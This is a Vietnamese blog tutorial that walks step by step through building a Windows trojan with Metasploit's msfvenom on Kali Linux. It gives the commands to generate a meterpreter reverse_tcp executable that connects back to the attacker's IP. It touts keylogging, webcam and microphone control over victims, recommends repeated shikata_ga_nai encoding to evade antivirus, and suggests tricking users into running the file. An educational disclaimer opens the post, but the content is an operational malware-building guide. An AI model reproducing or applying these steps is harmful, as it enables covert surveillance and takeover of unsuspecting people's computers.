Hướng dẫn cách tạo virus Trojan trên Kali Linux cực đơn giản

Trong bài viết này, chúng tôi sẽ hướng dẫn các bạn về cách tạo virus Trojan qua từng bước, chúng tôi sử dụng một trong số rất nhiều công cụ hack của Kali Linux để tạo virus trojan (còn được gọi là RAT (Remote Access Tool) trong các vòng kết nối hack). Tùy thuộc vào các công cụ chúng tôi sử dụng, chúng tôi có thể có quyền truy cập vào các tệp và quy trình hệ thống của nạn nhân, bao gồm khả năng ghi lại các lần gõ phím hoặc chụp ảnh màn hình thông qua webcam của họ.

KHUYẾN CÁO: Đây là một bài báo giáo dục nhằm mục đích nhận thức và giáo dục người đọc về các vụ hack. Không sử dụng công cụ này hoặc trang web trên bất kỳ trang web nào. Không áp dụng hoặc thực hiện bất kỳ phương pháp hoặc sử dụng các công cụ mà không có sự quan tâm của các bên. Kênh49.vn sẽ không chịu trách nhiệm dưới bất kỳ hình thức nào đối với bất kỳ hoạt động bất hợp pháp và việc sử dụng các công cụ của bạn. Chúng tôi muốn người đọc biết về các mối đe dọa đang hoạt động và cách chúng hoạt động. Sử dụng bài viết này chỉ để tham khảo cho mục đích học tập.

Xem thêm: Code hack facebook mới nhất

Bước 1: Cập nhật và nâng cấp Kali Linux

Trước tiên bước bài bài cách tạo virus Trojan. Bạn nên cập nhật Kali Linux định kỳ. Nếu bạn đã không nâng cấp trong một thời gian hoặc bạn chỉ khởi động nó, bây giờ là thời điểm tốt để cập nhật.

Xem thêm: Cách cài đặt Kali Linux

Mở terminal bằng cách nhấp vào cửa sổ ở trên cùng và nhập:

sudo apt-get update

Tiếp theo, nhập:

sudo apt-get upgrade

Thao tác này sẽ cập nhật hệ thống của bạn lên phiên bản mới nhất, đảm bảo rằng tất cả các công cụ sẽ hoạt động chính xác như bình thường. Bây giờ chúng ta có thể bắt đầu.

Bước 2: Mở phần mềm exploit

exploit kali linux

Trong bài viết này, chúng tôi sẽ sử dụng framework metasploit. Metasploit là một phần mềm được cài đặt sẵn trên tất cả các máy Kali Linux cho phép bạn tạo các payloads tùy chỉnh sẽ liên kết trở lại máy tính của bạn từ máy tính của nạn nhân. Trong trường hợp này, payload là RAT của chúng tôi. Sử dụng metasploit, hacker có thể tạo một payload, lưu nó vào một tệp và lừa một số người dùng không nghi ngờ nhấp vào nó thông qua kỹ thuật xã hội. Nếu bạn không biết ý của chúng tôi về kỹ thuật xã hội, hãy nghĩ đến trò lừa đảo Hoàng tử Nigeria nổi tiếng. Điểm khác biệt duy nhất trong trường hợp này là thay vì lừa người dùng cung cấp thông tin tài khoản ngân hàng cho anh ta, hacker lại đánh lừa người dùng nhấp vào một tệp độc hại.

Mở terminal và nhập

msfvenom

Thao tác này sẽ hiển thị danh sách các lệnh có sẵn cho bạn trong metasploit. Để xem các payload có sẵn, hãy nhập vào

msfvenom -l payloads

Cách tạo virus trojan

Điều này sẽ liệt kê tất cả các payloads có sẵn để bạn sử dụng. Như bạn có thể thấy, có rất nhiều. Nếu bạn muốn xem các tùy chọn khác, bạn có thể nhập bất kỳ tùy chọn nào khác được liệt kê trên màn hình. Bạn có thể thấy các tùy chọn như formatting, platforms, encoders (sẽ được thảo luận sau trong bài viết này), encryption keys, bad characters, và nhiều tùy chọn khác.

Sửa lỗi khi gặp vấn đề về cách tạo virus Trojan

Khi đưa ra lệnh liệt kê các payloads, bạn có thể gặp lỗi sau:

Tạo virus Trojan

Nếu bạn thấy điều này, điều đó có nghĩa là trình gói được thiết lập không chính xác hoặc chưa được cập nhật.

Lưu ý: nếu bạn không thấy lỗi này, bạn có thể chuyển sang bước 3.

Để khắc phục điều này, hãy thay đổi thư mục (tệp) hiện tại thành usr/share/metasploit-framework bằng cách nhập:

cd /usr/share/metasploit-framework/

từ root directory. Nếu bạn mắc lỗi, bạn có thể nhập

cd ..

để quay lại thư mục trước đó hoặc nhập vào bất kỳ thư mục nào sau cd để đến đó.

Bây giờ chúng ta đang ở trong thư mục metasploit-framework, hãy nhập

gem install bundler

để cài đặt gói, sau đó nhập

bundle install

Nếu Bundler không phải là phiên bản chính xác, bạn sẽ nhận được thông báo cho biết phiên bản nào cần cài đặt (trong trường hợp này là phiên bản 1.17.3). Gõ vào

gem install bundler:[version number]

và sau đó gõ vào

gem update –system

Cài đặt bundler

Cài đặt bundler

Sau tất cả những điều đó, mọi thứ sẽ hoạt động hoàn hảo.

Gõ vào

cd /root

để quay lại thư mục gốc.

Bước 3: Chọn payload

Gõ vào

msfvenom -l payloads

để xem danh sách các payload.

Chúng tôi khuyên bạn nên sử dụng windows/meterpreter/reverse_tcp. Nó cho phép bạn nhập keylog, tìm kiếm dữ liệu và kiểm soát hệ thống tệp, micrô và webcam của máy tính bị nhiễm. Nó là một trong những tải trọng linh hoạt, xâm lấn và tàn phá nhất trong metasploit.

Cách tạo virus Trojan

Bước 4: Tùy chỉnh payload

Bây giờ chúng tôi đã có payload của mình, chúng tôi có thể kiểm tra những tùy chọn chúng tôi có. Thể loại:

msfvenom –list-options -p [payload]

để xem chúng tôi có thể thay đổi những gì về khai thác và nơi khai thác gửi thông tin.

Tạo virus Trojan trên Kali

Chúng tôi thấy rằng LHOST trống; đây là nơi mà kẻ khai thác gửi thông tin từ thiết bị bị nhiễm. Trong hầu hết các trường hợp, đây sẽ là địa chỉ ip của bạn.

Để tìm địa chỉ ip của bạn, hãy nhập

ifconfig

vào thiết bị đầu cuối để lấy cửa sổ này. Địa chỉ ip của bạn nằm sau từ “inet”. Nếu bạn kết nối với internet qua ethernet, hãy sử dụng địa chỉ ip tại eth0; nếu bạn được kết nối không dây, hãy sử dụng kết nối tại wlan0.

Tạo Trojan

Địa chỉ ip của chúng tôi là tham số LHOST của chúng tôi.

Bước 5: Tạo Trojan

Bây giờ chúng tôi có payload, địa chỉ ip và số port, chúng tôi có tất cả thông tin mà chúng tôi cần. Gõ vào:

msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -f [file type] > [path]

Loại tệp phải là exe và đường dẫn phải là tên tệp (đảm bảo phần mở rộng tệp sau tên và loại tệp khớp nhau). Đặc biệt hãy đảm bảo không nhấn enter trước khi đặt “> [path]”, vì thao tác này sẽ chạy quá trình khai thác trên thiết bị của chính bạn.

Cách tạo virus Trojan

Nếu chúng tôi xem các tệp của mình bằng ls, chúng tôi thấy rằng tệp mới của chúng tôi bật lên.

Hướng dận tạo virus trojan

Bước 6: Mã hóa Trojan

Vì windows/meterpreter/reverse_tcp là một cách khai thác phổ biến, nhiều chương trình chống virus sẽ phát hiện ra nó. Tuy nhiên, chúng tôi có thể mã hóa chương trình để phần mềm chống virus không thể bắt được. Đi kèm với metasploit là một danh sách dài các mã hóa. Thể loại:

msfvenom -l encoders to see a list of them.

Mã hóa Trojan

Khi bạn chọn mã hóa bạn muốn (chúng tôi khuyên bạn nên chọn x86/shikata_ga_nai), bạn có thể mã hóa nó nhiều lần khi bạn nhập lệnh để thực hiện khai thác. Mã hóa tệp nhiều lần giúp ngăn các chương trình chống vi-rút bắt vi-rút của bạn. Gõ vào:

msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -e [encoder] -i [number of times to encrypt] -f [file type] > [path]

Mã hóa virus Trojan

Bây giờ chúng tôi đã tạo ra một loại virus trojan đã được mã hóa và khó nhận ra hơn bởi một chương trình chống virus. Nếu chúng ta nhập ‘ls’ để xem các tệp của mình, chúng ta sẽ thấy…

Tạo Virus Trojan

Trojan mới của chúng tôi có trong các tệp của chúng tôi.

Bước 7: Mở phiên Meterpreter để Trojan có thể kết nối lại với bạn

Đối với bước này, vui lòng truy cập Cách sử dụng Meterpreter khi kiểm soát Trojan. Đảm bảo rằng bạn sử dụng địa chỉ ip của mình (địa chỉ ip của máy tính chạy Kali và địa chỉ bạn đã sử dụng khi tạo trojan) và cũng sử dụng cùng một cách khai thác: windows/meterpreter/reverse_tcp

Cuối cùng cũng xong về cách tạo virus Trojan. Chúc các bạn thực hành vui vẻ. Nhưng chỉ áp dụng cho mục đích thử nghiệm, tìm hiểu về cách hoạt động phục vụ cho việc học tập. Không nên sử dụng những kiến thức này cho hoạt động phá hoại.

 

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *